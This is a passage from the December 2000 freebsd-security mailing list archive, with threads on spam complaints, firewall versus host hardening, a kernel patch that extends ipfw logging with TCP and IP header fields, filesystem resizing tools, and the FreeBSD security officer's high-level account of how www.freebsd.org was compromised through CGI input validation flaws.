don't know whether Julian's complaint script handles > that.... I added it to mine about two months ago. When I used the abuse.net address (home.com@abuse.net) for the IP address, it forwarded it on to rogerswave.ca no problem. SeanMike -- SeanMike Whipkey - "The Man. The goatee. The reputation." - Kimmet "What the hell is wrong with that boy?!?" - Adrienne Uphoff "What the French lack in reason they make up for in sheer gall." - Onion "Did anyone else read this and think of SeanMike?" - Leybourne To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 13:59:44 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 13:59:42 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id A86FE37B400 for ; Wed, 13 Dec 2000 13:59:41 -0800 (PST) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id OAA16277; Wed, 13 Dec 2000 14:59:24 -0700 (MST) Message-Id: <4.3.2.7.2.20001213145744.047c9250@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 13 Dec 2000 14:59:19 -0700 To: Roger Marquis , security@FreeBSD.ORG From: Brett Glass Subject: Re: Get that spammer! (bizland-inc.com) In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 02:33 PM 12/13/2000, Roger Marquis wrote: >You can complain to Bizland's ISP, however, given the large volume >and multiple incidents this ISP has not responded to it is likely >they have a "pink contract" which permits the spam to continue. > >Bizland's ISP is Exodus, not known for AUP enforcement. Yes. Exodus is the new AGIS. They should be treated to the same shunning within the ISP community that was previously reserved for the network that hosted "Spamford" Wallace. --Brett Glass "He has a memory like an effluent." --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 19:44:11 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 19:44:09 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from digitalinet.com (digitalinet.com [216.65.124.130]) by hub.freebsd.org (Postfix) with SMTP id BEE6137B400 for ; Wed, 13 Dec 2000 19:44:09 -0800 (PST) Received: (qmail 87021 invoked from network); 14 Dec 2000 03:46:47 -0000 Received: from unknown (HELO john) (24.26.71.56) by digitalinet.com with SMTP; 14 Dec 2000 03:46:47 -0000 Message-ID: <001301c06580$5ead2a40$03030303@john> From: "John" To: Subject: unsubscribe freebsd-security Date: Wed, 13 Dec 2000 22:45:57 -0500 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0010_01C06556.7561A420" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0010_01C06556.7561A420 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable unsubscribe freebsd-security ------=_NextPart_000_0010_01C06556.7561A420 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

unsubscribe freebsd-security

------=_NextPart_000_0010_01C06556.7561A420-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 22:10:28 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 22:10:24 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 110E637B400 for ; Wed, 13 Dec 2000 22:10:24 -0800 (PST) Received: from bsdie.rwsystems.net([209.197.223.2]) (2878 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Thu, 14 Dec 2000 00:09:55 -0600 (CST) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Thu, 14 Dec 2000 00:09:54 -0600 (CST) From: James Wyatt To: Terry Zink Cc: freebsd-security@FreeBSD.ORG Subject: Re: 911 lockdown! In-Reply-To: <5.0.0.25.0.20001213132136.00a2c7b0@mail.metrocon.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Uh, service access can easily be controlled with ipfw, tcp-wrappers, or ipfilter. Ssh has the sshd_config file as well. These tools and others in it's arsenal make FreeBSD an excellent bastion host OS. (But we all know that here, right? (^_^) Firewalls are to prevent harm to hosts (incl. workgroups) that can not always be trusted or even hardened enough to let remain unprotected. Groups of boxes running SMB/Sun RPCs (ala Windows file shares, NFS, NIS, etc...) , applications with weak authentication (open POP3, rsh, etc...), or old versions (ancient sendmail, some wuftpds, etc...) are easier to put behind a firewall than make secure enough to allow "in public". A single FreeBSD host with an admin who watches alerts does not need an extra point of failure between it and The Net or the cost and overhead of an extra firewall. For several of my smaller customers, it *is* the firewall as well as the application server. If your users are all using POP and telnet on the local net, cool, but what do you do when they *need* ssh or telnet from "anywhere" and pick a dumb password? Nothing technical can fix that. If they don't need anything but the local LAN, FreeBSD's access controls are as good as any firewall. Or have I had too much to think tonight? - Jy@ On Wed, 13 Dec 2000, Terry Zink wrote: > Rather easily. If the outsider cannot get into the proper services (ssh > most likely) to log in, then he cant crack. > > Most crackers use telnet, or pop. But if he finds the pop pass he cant do > much if telnet and ssh are closed to all but the internal network. [ ... ] > At 10:09 AM 12/13/00 -0700, Brett the Glass wrote: > >Pardon me if I'm missing something here, but how would a firewall > >prevent someone from cracking a guessable password on a legitimate > >user account? > >At 09:18 AM 12/13/2000, Robert McCallum wrote: > > >My DNS/MAIL/WEB server was hacked recently, I don't believe they 'rooted' > > >the server 'yet'. But I do see that they have obtained access to a user > > >account. It apears they cracked a users account which I found out that one > > >of my users did not adhere to our security policy and set a password that > > >was not in accordance to our password policy. [ ... ] > > >In conclusion, I need to setup a firewall on that particular host ASAP. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 0: 4:30 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 00:04:27 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [207.154.226.10]) by hub.freebsd.org (Postfix) with ESMTP id BACC237B402 for ; Thu, 14 Dec 2000 00:04:27 -0800 (PST) Received: by elvis.mu.org (Postfix, from userid 1098) id 293032B210; Thu, 14 Dec 2000 02:04:27 -0600 (CST) Date: Thu, 14 Dec 2000 02:04:27 -0600 From: Bill Fumerola To: Wes Peters Cc: jucnik@ew.sk, freebsd-security@freebsd.org Subject: Re: Interface Message-ID: <20001214020426.N72273@elvis.mu.org> References: <3A362FFB.4000@ew.sk> <3A3659F8.B7C1F990@softweyr.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3A3659F8.B7C1F990@softweyr.com>; from wes@softweyr.com on Tue, Dec 12, 2000 at 10:01:44AM -0700 X-Operating-System: FreeBSD 4.2-FEARSOME-20001103 i386 Sender: billf@elvis.mu.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Dec 12, 2000 at 10:01:44AM -0700, Wes Peters wrote: > jucnik@ew.sk wrote: > > I know this is off-topic, but does anybody know, why in include file > > is so many errors (defined struct: aaa struct sockaddr bbb > > instead of aaa struct sockaddr *bbb) ? > > > > i can't compile my progs without this functional... > > has no errors in it. Your program has an error, not including > the other include files that needs. Locate the structures that > are not defined in the include files and #include those before . > Repeat until the errors go away. > > Or, poke through the system sources for another source file that includes > and duplicate its list of include files. man inet -- Bill Fumerola - security yahoo / Yahoo! inc. - fumerola@yahoo-inc.com / billf@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 0:32:36 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 00:32:28 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id AD25837B400 for ; Thu, 14 Dec 2000 00:32:28 -0800 (PST) Received: from rfx-64-6-211-1.users.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Thu, 14 Dec 2000 00:30:44 -0800 Received: (from cjc@localhost) by rfx-64-6-211-1.users.reflexcom.com (8.11.0/8.11.0) id eBE8WJd35805 for freebsd-security@freebsd.org; Thu, 14 Dec 2000 00:32:19 -0800 (PST) (envelope-from cjc) Date: Thu, 14 Dec 2000 00:32:19 -0800 From: "Crist J. Clark" To: freebsd-security@freebsd.org Subject: Extended ipfw Logging Message-ID: <20001214003219.K96105@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="ZmUaFz6apKcXQszQ" X-Mailer: Mutt 1.0i Sender: cjc@rfx-64-6-211-1.users.reflexcom.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --ZmUaFz6apKcXQszQ Content-Type: text/plain; charset=us-ascii I posted this to the freebsd-ipfw list, but thought some of those in this group who do not follow that list might be interested too. INTRODUCTION I wanted to add some detail to the ipfw logging. Specificially, I wanted TCP flags. However, once I started coding, I decided why not toss just about every field of interest in. I have attached patches. WHAT THE PATCHES DO There are new fields for all packets. Data from the IP header, the IP ID, TTL, and extra fragmentation information is printed for all types of datagrams. TCP packets include additional information on sequence number, acknowledgement number, and flags. Here are examples. First, a TCP handshake, brief data exchange, and close (a telnet to the echo port), ipfw: 400 Accept TCP 192.168.64.254:2932 192.168.64.20:7 f=0x02 s=0x7feef91d a=0x00000000 i=0x48a9 t=0x40 in via ep0 DF ipfw: 400 Accept TCP 192.168.64.20:7 192.168.64.254:2932 f=0x12 s=0xeaa736a6 a=0x7feef91e i=0x0080 t=0x40 out via ep0 DF ipfw: 400 Accept TCP 192.168.64.254:2932 192.168.64.20:7 f=0x10 s=0x7feef91e a=0xeaa736a7 i=0x48aa t=0x40 in via ep0 DF ipfw: 400 Accept TCP 192.168.64.254:2932 192.168.64.20:7 f=0x18 s=0x7feef91e a=0xeaa736a7 i=0x48ca t=0x40 in via ep0 DF ipfw: 400 Accept TCP 192.168.64.20:7 192.168.64.254:2932 f=0x18 s=0xeaa736a7 a=0x7feef925 i=0x0083 t=0x40 out via ep0 DF ipfw: 400 Accept TCP 192.168.64.254:2932 192.168.64.20:7 f=0x10 s=0x7feef925 a=0xeaa736ae i=0x48cb t=0x40 in via ep0 DF ipfw: 400 Accept TCP 192.168.64.254:2932 192.168.64.20:7 f=0x11 s=0x7feef925 a=0xeaa736ae i=0x48ee t=0x40 in via ep0 DF ipfw: 400 Accept TCP 192.168.64.20:7 192.168.64.254:2932 f=0x10 s=0xeaa736ae a=0x7feef926 i=0x0086 t=0x40 out via ep0 DF ipfw: 400 Accept TCP 192.168.64.20:7 192.168.64.254:2932 f=0x11 s=0xeaa736ae a=0x7feef926 i=0x0087 t=0x40 out via ep0 DF ipfw: 400 Accept TCP 192.168.64.254:2932 192.168.64.20:7 f=0x10 s=0x7feef926 a=0xeaa736af i=0x48f0 t=0x40 in via ep0 DF Here is UDP (a timed update), ipfw: 400 Accept UDP 192.168.64.254:525 192.168.64.20:525 i=0x4bb8 t=0x40 in via ep0 ipfw: 400 Accept UDP 192.168.64.20:525 192.168.64.254:525 i=0x008b t=0x40 out via ep0 ipfw: 400 Accept UDP 192.168.64.254:525 192.168.64.255:525 i=0x4bb9 t=0x40 in via ep And finally, some fragmentation and ICMP (an oversized ping), ipfw: 400 Accept ICMP:8.0 192.168.64.254 192.168.64.20 i=0x5038 t=0xff in via ep0 Frag=0+ ipfw: 400 Accept ICMP 192.168.64.254 192.168.64.20 i=0x5038 t=0xff in via ep0 Frag=1480+ ipfw: 400 Accept ICMP 192.168.64.254 192.168.64.20 i=0x5038 t=0xff in via ep0 Frag=2960 ipfw: 400 Accept ICMP:0.0 192.168.64.20 192.168.64.254 i=0x0095 t=0xff out via ep0 There are more fields that could be done, but this is all I was interested in doing when coding. HOW TO INSTALL AND CONTROL Simply use patch(1) to apply the attached patches to your kernel source. The patches were made and tested on 5-CURRENT, but they will apply cleanly to 4-STABLE and I don't see why they would function any differently. To enable the patches in your kernel, add, options IPFIREWALL_EXTRA_VERBOSE To your kernel config. The patches use the net.inet.ip.fw.verbose sysctl knob, net.inet.ip.fw.verbose=0 # No logging net.inet.ip.fw.verbose=1 # Standard logging net.inet.ip.fw.verbose=2 # Enhanced logging logging So once compiled in, the changes can be switched on the fly. When the kernel is compiled with IPFIREWALL_EXTRA_VERBOSE, the verbose level of '2' is the default after reboot. SECURITY AND PERFORMANCE ISSUES I was questioned whether this might make a firewall box easier to DoS. I do not think there is any significant threat above that of a box with standard logging. If you have a look at the patches, there is not a whole lot of new code (although we are making snprintf(3) calls). If you already have logging running, I doubt the change in performance would be noticable. Another point someone brought up was whether this might overflow logs because you will not be getting 'last message repeated' lines from syslogd. Since the IP ID and other fields should be changing for every packet, you will not be seeing those. This might start to fill up logs more if you are having misconfiguration problems, but I do not think it makes the box easier to attack. It is trivial for an attacker to mix things up so that you will not get 'last message repeated' lines. Take something like a Smurf for example. You would be getting pounded from multiple source addresses. To summarize, if you want more information in your logs, these patches should give you more of what you want with little to no cost. If anyone has suggestions, bugs, criticism, or praise, send it along. Obviously, if it is something that you think others on the list might wish to discuss, CC the list. Otherwise, feel free to send mail directly to me. LOGGING AND CAPTURE DAEMON Another thing I was considering was the idea of making a more configurable logging utility and possibly a utility that will even capture packets. The magic of divert(4) sockets make it fairly straightforward to do these things in userland where you can add new abilities without worrying about bloating or breaking the kernel. This is similar to how some other firewall tools work. In addition to more configurable and expandable logging, I was considering the capability to capture raw packets. Now, I really do not think trying to build something like a fully loaded IDS from this is worthwhile when you have great tools like Snort available, but I think its usefulness for debugging a firewall would be reason enough and any actual security uses people find would be great. I have not really decided if I am going to do this. If I no one else is interested, I think I am best off just customizing my FreeBSD kernel code as needed or making a really basic (not necessarily user friendly or well documented) userland logger. Thanks. Have fun with the patches and please let me know if you are using them. -- Crist J. Clark cjclark@alum.mit.edu --ZmUaFz6apKcXQszQ Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="ip_fw.patch" --- ip_fw.c Sun Dec 10 19:13:17 2000 +++ /usr/src/sys/netinet/ip_fw.c Wed Dec 13 23:52:04 2000 @@ -67,7 +67,11 @@ static int fw_debug = 1; #ifdef IPFIREWALL_VERBOSE +#ifdef IPFIREWALL_EXTRA_VERBOSE +static int fw_verbose = 2; +#else static int fw_verbose = 1; +#endif #else static int fw_verbose = 0; #endif @@ -488,7 +492,7 @@ struct icmp *const icmp = (struct icmp *) ((u_int32_t *) ip + ip->ip_hl); u_int64_t count; char *action; - char action2[32], proto[47], name[18], fragment[17]; + char action2[32], proto[97], name[18], fragment[17]; int len; count = f ? f->fw_pcnt : ++counter; @@ -572,9 +576,18 @@ len += snprintf(SNPARGS(proto, len), " "); len += snprintf(SNPARGS(proto, len), "%s", inet_ntoa(ip->ip_dst)); - if ((ip->ip_off & IP_OFFMASK) == 0) - snprintf(SNPARGS(proto, len), ":%d", + if ((ip->ip_off & IP_OFFMASK) == 0) { + len += snprintf(SNPARGS(proto, len), ":%d", ntohs(tcp->th_dport)); +#ifdef IPFIREWALL_EXTRA_VERBOSE + if ( fw_verbose > 1 ) + len += snprintf(SNPARGS(proto, len), + " f=0x%02x s=0x%08x a=0x%08x", + tcp->th_flags, + ntohl(tcp->th_seq), + ntohl(tcp->th_ack)); +#endif + } break; case IPPROTO_UDP: len = snprintf(SNPARGS(proto, 0), "UDP %s", @@ -587,7 +600,7 @@ len += snprintf(SNPARGS(proto, len), "%s", inet_ntoa(ip->ip_dst)); if ((ip->ip_off & IP_OFFMASK) == 0) - snprintf(SNPARGS(proto, len), ":%d", + len += snprintf(SNPARGS(proto, len), ":%d", ntohs(udp->uh_dport)); break; case IPPROTO_ICMP: @@ -598,20 +611,46 @@ len = snprintf(SNPARGS(proto, 0), "ICMP "); len += snprintf(SNPARGS(proto, len), "%s", inet_ntoa(ip->ip_src)); - snprintf(SNPARGS(proto, len), " %s", inet_ntoa(ip->ip_dst)); + len += snprintf(SNPARGS(proto, len), " %s", inet_ntoa(ip->ip_dst)); break; default: len = snprintf(SNPARGS(proto, 0), "P:%d %s", ip->ip_p, inet_ntoa(ip->ip_src)); - snprintf(SNPARGS(proto, len), " %s", inet_ntoa(ip->ip_dst)); + len += snprintf(SNPARGS(proto, len), " %s", inet_ntoa(ip->ip_dst)); break; } - if ((ip->ip_off & IP_OFFMASK)) +#ifdef IPFIREWALL_EXTRA_VERBOSE + if ( fw_verbose > 1 ) { + snprintf(SNPARGS(proto, len), + " i=0x%04x t=0x%02x", + ntohs(ip->ip_id), + ip->ip_ttl); + if (ip->ip_off & IP_DF) + len = snprintf(SNPARGS(fragment, 0), " DF"); + else { + fragment[0] = '\0'; + len = 0; + } + if (ip->ip_off & (IP_OFFMASK | IP_MF)) + len += snprintf(SNPARGS(fragment, len), " Frag=%d", + (ip->ip_off & IP_OFFMASK)<<3); + if (ip->ip_off & IP_MF) + len += snprintf(SNPARGS(fragment, len), "+"); + } else { + if (ip->ip_off & (IP_OFFMASK | IP_MF)) + snprintf(SNPARGS(fragment, 0), " Fragment = %d", + ip->ip_off & IP_OFFMASK); + else + fragment[0] = '\0'; + } +#else + if (ip->ip_off & (IP_OFFMASK | IP_MF)) snprintf(SNPARGS(fragment, 0), " Fragment = %d", ip->ip_off & IP_OFFMASK); else fragment[0] = '\0'; +#endif if (oif) log(LOG_SECURITY | LOG_INFO, "%s %s %s out via %s%d%s\n", name, action, proto, oif->if_name, oif->if_unit, fragment); --ZmUaFz6apKcXQszQ Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="options.patch" --- options Sun Dec 10 18:25:56 2000 +++ /usr/src/sys/conf/options Sun Dec 10 01:45:19 2000 @@ -245,6 +245,7 @@ PFIL_HOOKS opt_pfil_hooks.h IPFIREWALL opt_ipfw.h IPFIREWALL_VERBOSE opt_ipfw.h +IPFIREWALL_EXTRA_VERBOSE opt_ipfw.h IPFIREWALL_VERBOSE_LIMIT opt_ipfw.h IPFIREWALL_DEFAULT_TO_ACCEPT opt_ipfw.h IPFIREWALL_FORWARD opt_ipfw.h --ZmUaFz6apKcXQszQ-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 1: 6:27 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 01:06:25 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from genius.tao.org.uk (genesis.tao.org.uk [194.242.131.94]) by hub.freebsd.org (Postfix) with ESMTP id 4131E37B400; Thu, 14 Dec 2000 01:06:24 -0800 (PST) Received: by genius.tao.org.uk (Postfix, from userid 100) id 5D2879B38; Thu, 14 Dec 2000 09:06:33 +0000 (GMT) Date: Thu, 14 Dec 2000 09:06:33 +0000 From: Josef Karthauser To: Eivind Eklund Cc: sthaug@nethelp.no, beaupran@jsp.umontreal.ca, spidey@libdns.qc.ca, sheldonh@iafrica.com, 026809r@dragon.acadiau.ca, fpscha@ns1.sminter.com.ar, dillon@apollo.backplane.com, dscheidt@enteract.com, unicorn@blackhats.org, freebsd-security@FreeBSD.ORG Subject: Re: Partition Sites [was Re: ACLs] Message-ID: <20001214090633.B4186@bsdi.com> Mail-Followup-To: Josef Karthauser , Eivind Eklund , sthaug@nethelp.no, beaupran@jsp.umontreal.ca, spidey@libdns.qc.ca, sheldonh@iafrica.com, 026809r@dragon.acadiau.ca, fpscha@ns1.sminter.com.ar, dillon@apollo.backplane.com, dscheidt@enteract.com, unicorn@blackhats.org, freebsd-security@FreeBSD.ORG References: <4155.921570512@verdi.nethelp.no> <19990316104827.C3196@bitbox.follo.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <19990316104827.C3196@bitbox.follo.net>; from eivind@FreeBSD.ORG on Tue, Mar 16, 1999 at 10:48:28AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Mar 16, 1999 at 10:48:28AM +0100, Eivind Eklund wrote: > > > > There is already a program available that can do most of the job, see > > > > http://www.nethelp.no/scsi/fsresize.c > > > > (No I didn't write it.) It gets the cylinder group summary information > > wrong, and this has to be fixed by an fsck. I wouldn't feel comfortable > > using such a system until it got *everything* right... > > According to the author (der Mouse), there are more things it gets > wrong. As far as I understood, he doesn't distribute it except to > people that want it as a basis for further hacking, as it sometimes > eats filesystems. Or get a copy of growfs and ffsinfo from the head branch. They were committed to FreeBSD last week. Joe -- Josef Karthauser [joe@FreeBSD.org, joe@tao.org.uk] ......... FreeBSD: The power to change the world ........ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 1: 7: 6 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 01:07:03 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from genius.tao.org.uk (genesis.tao.org.uk [194.242.131.94]) by hub.freebsd.org (Postfix) with ESMTP id D641137B404; Thu, 14 Dec 2000 01:07:02 -0800 (PST) Received: by genius.tao.org.uk (Postfix, from userid 100) id 8A9709B39; Thu, 14 Dec 2000 09:07:19 +0000 (GMT) Date: Thu, 14 Dec 2000 09:07:19 +0000 From: Josef Karthauser To: Eivind Eklund Cc: sthaug@nethelp.no, beaupran@jsp.umontreal.ca, spidey@libdns.qc.ca, sheldonh@iafrica.com, 026809r@dragon.acadiau.ca, fpscha@ns1.sminter.com.ar, dillon@apollo.backplane.com, dscheidt@enteract.com, unicorn@blackhats.org, freebsd-security@FreeBSD.ORG Subject: Re: Partition Sites [was Re: ACLs] Message-ID: <20001214090719.C4186@bsdi.com> Mail-Followup-To: Josef Karthauser , Eivind Eklund , sthaug@nethelp.no, beaupran@jsp.umontreal.ca, spidey@libdns.qc.ca, sheldonh@iafrica.com, 026809r@dragon.acadiau.ca, fpscha@ns1.sminter.com.ar, dillon@apollo.backplane.com, dscheidt@enteract.com, unicorn@blackhats.org, freebsd-security@FreeBSD.ORG References: <4155.921570512@verdi.nethelp.no> <19990316104827.C3196@bitbox.follo.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <19990316104827.C3196@bitbox.follo.net>; from eivind@FreeBSD.ORG on Tue, Mar 16, 1999 at 10:48:28AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Mar 16, 1999 at 10:48:28AM +0100, Eivind Eklund wrote: > On Tue, Mar 16, 1999 at 08:48:32AM +0100, sthaug@nethelp.no wrote: > > > It was a joke, and I'll never carry on such a job... I'd rather attack to > > > monstrous task of resizing existing filesystems!!! Thing which I would > > > obviously not be able to accomplish... :) > > > > There is already a program available that can do most of the job, see > > > > http://www.nethelp.no/scsi/fsresize.c > > > > (No I didn't write it.) It gets the cylinder group summary information > > wrong, and this has to be fixed by an fsck. I wouldn't feel comfortable > > using such a system until it got *everything* right... > > According to the author (der Mouse), there are more things it gets > wrong. As far as I understood, he doesn't distribute it except to > people that want it as a basis for further hacking, as it sometimes > eats filesystems. Whoops, this is a _really_ only mail isn't it! :) Joe -- Josef Karthauser [joe@FreeBSD.org, joe@tao.org.uk] ......... FreeBSD: The power to change the world ........ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 1:11:30 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 01:11:26 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from genius.tao.org.uk (genesis.tao.org.uk [194.242.131.94]) by hub.freebsd.org (Postfix) with ESMTP id BEC7D37B400; Thu, 14 Dec 2000 01:11:25 -0800 (PST) Received: by genius.tao.org.uk (Postfix, from userid 100) id E63059B38; Thu, 14 Dec 2000 09:11:40 +0000 (GMT) Date: Thu, 14 Dec 2000 09:11:40 +0000 From: Josef Karthauser To: Josef Karthauser Cc: Eivind Eklund , sthaug@nethelp.no, beaupran@jsp.umontreal.ca, spidey@libdns.qc.ca, sheldonh@iafrica.com, 026809r@dragon.acadiau.ca, fpscha@ns1.sminter.com.ar, dillon@apollo.backplane.com, dscheidt@enteract.com, unicorn@blackhats.org, freebsd-security@FreeBSD.ORG Subject: Re: Partition Sites [was Re: ACLs] Message-ID: <20001214091140.D4186@bsdi.com> Mail-Followup-To: Josef Karthauser , Eivind Eklund , sthaug@nethelp.no, beaupran@jsp.umontreal.ca, spidey@libdns.qc.ca, sheldonh@iafrica.com, 026809r@dragon.acadiau.ca, fpscha@ns1.sminter.com.ar, dillon@apollo.backplane.com, dscheidt@enteract.com, unicorn@blackhats.org, freebsd-security@FreeBSD.ORG References: <4155.921570512@verdi.nethelp.no> <19990316104827.C3196@bitbox.follo.net> <20001214090719.C4186@bsdi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001214090719.C4186@bsdi.com>; from joe@tao.org.uk on Thu, Dec 14, 2000 at 09:07:19AM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Dec 14, 2000 at 09:07:19AM +0000, Josef Karthauser wrote: > On Tue, Mar 16, 1999 at 10:48:28AM +0100, Eivind Eklund wrote: > > On Tue, Mar 16, 1999 at 08:48:32AM +0100, sthaug@nethelp.no wrote: > > > > It was a joke, and I'll never carry on such a job... I'd rather attack to > > > > monstrous task of resizing existing filesystems!!! Thing which I would > > > > obviously not be able to accomplish... :) > > > > > > There is already a program available that can do most of the job, see > > > > > > http://www.nethelp.no/scsi/fsresize.c > > > > > > (No I didn't write it.) It gets the cylinder group summary information > > > wrong, and this has to be fixed by an fsck. I wouldn't feel comfortable > > > using such a system until it got *everything* right... > > > > According to the author (der Mouse), there are more things it gets > > wrong. As far as I understood, he doesn't distribute it except to > > people that want it as a basis for further hacking, as it sometimes > > eats filesystems. > > Whoops, this is a _really_ only mail isn't it! :) [slap] I meant "old" not "only". That's what happens when I forget to have coffee before replying to mail. This one had been in my mailbox for 18 months because it had a URL of interest in it. Joe -- Josef Karthauser [joe@FreeBSD.org, joe@tao.org.uk] ......... FreeBSD: The power to change the world ........ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 7: 5:34 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 07:05:31 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from citusc.usc.edu (citusc.usc.edu [128.125.38.123]) by hub.freebsd.org (Postfix) with ESMTP id 7812737B400 for ; Thu, 14 Dec 2000 07:05:31 -0800 (PST) Received: (from kris@localhost) by citusc.usc.edu (8.9.3/8.9.3) id HAA25459 for security@freebsd.org; Thu, 14 Dec 2000 07:06:49 -0800 Date: Thu, 14 Dec 2000 07:06:49 -0800 From: Kris Kennaway To: security@freebsd.org Subject: Details of www.freebsd.org penetration Message-ID: <20001214070649.A25429@citusc.usc.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="mP3DRpeJDSE+ciuQ" Content-Disposition: inline User-Agent: Mutt/1.2i Sender: kris@citusc.usc.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --mP3DRpeJDSE+ciuQ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline As promised, here are the details of the recent penetration of the www.freebsd.org server. As several people guessed, the initial penetration involved weaknesses in the CGI scripts running on the website. This gained control of user nobody, and then a local root vulnerability was leveraged to gain root access to the machine. As far as we could tell, the attackers' only action was to plant a greeting on the main webpage. They contacted the security-officer immediately describing the entry mechanism and the extent of their activities, and while we do not believe any further malicious activity was carried out, various protective measures were taken to sanitize the compromised system, including an audit for all known security holes and a complete system upgrade. The www cgi scripts have since been audited by several people for other vulnerabilities, four of which were found and corrected (I don't have the exact details to hand). All involved input validation errors which allowed a remote user to execute commands as the user running the cgi scripts (user nobody). There is still further work which is being done on the cgi scripts to ensure greater safety (e.g. use of perl's taint mode), but the auditors believe the problems have been fixed. There are also other changes planned to improve the security of machines in the freebsd.org cluster against future penetration attempts. It's my understanding that none of the www.freebsd.org mirrors use the CGI scripts, therefore this vulnerability is likely limited to the one main server - but if anyone else has adapted freebsd CGI scripts for their own purposes they are advised to catch up with recent changes. Since the website contents are not a supported FreeBSD product an advisory is not planned for these vulnerabilities. Sorry for taking longer than promised to send this mail. I am currently suffering under very reduced connectivity while back home in Australia for the holidays. Thanks for everyone's patience. Kris Kennaway FreeBSD Security Officer --mP3DRpeJDSE+ciuQ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) 